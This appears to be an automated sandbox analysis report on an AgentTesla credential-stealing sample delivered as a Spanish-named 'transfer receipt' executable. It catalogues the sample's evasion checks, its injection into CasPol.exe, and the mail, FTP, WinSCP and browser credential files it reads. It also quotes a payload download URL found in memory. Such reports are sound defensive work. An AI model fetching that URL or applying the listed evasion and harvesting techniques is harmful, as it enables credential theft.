Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\justificante de la transfer.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: justificante de la transfer.exe, 00000000.00000002.933025555.00000000006A4000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1BI-SJR4KZFRIPFDPNOXJN3S8BMNH3ZRT
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 4228 Thread sleep time: -2767011611056431s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\justificante de la transfer.exe Window / User API: threadDelayed 9998 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Window / User API: threadDelayed 9947 Jump to behavior
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe System information queried: ModuleInformation Jump to behavior
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: CasPol.exe, 0000000B.00000002.5674515926.0000000000EE6000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWX
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAWG$s
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 0000000B.00000002.5677591920.0000000000F56000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1Bi-sjR4KzfRIPfdPNOxJn3S8BMnh3zRT
Source: justificante de la transfer.exe, 00000000.00000002.933025555.00000000006A4000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exeC
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5671286322.0000000000D00000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: justificante de la transfer.exe, 00000000.00000002.935848757.00000000054D9000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: justificante de la transfer.exe, 00000000.00000002.935718483.0000000005410000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
Source: CasPol.exe, 0000000B.00000002.5685436026.00000000029C9000.00000004.00000001.sdmp Binary or memory string: vmicheartbeat

Anti Debugging:

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\justificante de la transfer.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Thread information set: HideFromDebugger Jump to behavior
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process token adjusted: Debug Jump to behavior
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Code function: 11_2_00A07100 LdrInitializeThunk, 11_2_00A07100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\justificante de la transfer.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: B00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe" Jump to behavior
Source: C:\Users\user\Desktop\justificante de la transfer.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\justificante de la transfer.exe" Jump to behavior
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp Binary or memory string: Progman
Source: CasPol.exe, 0000000B.00000002.5683872339.0000000001570000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8676, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8676, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected AgentTesla
Source: Yara match File source: 0000000B.00000002.5698566884.000000001DC81000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 8676, type: MEMORYSTR
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs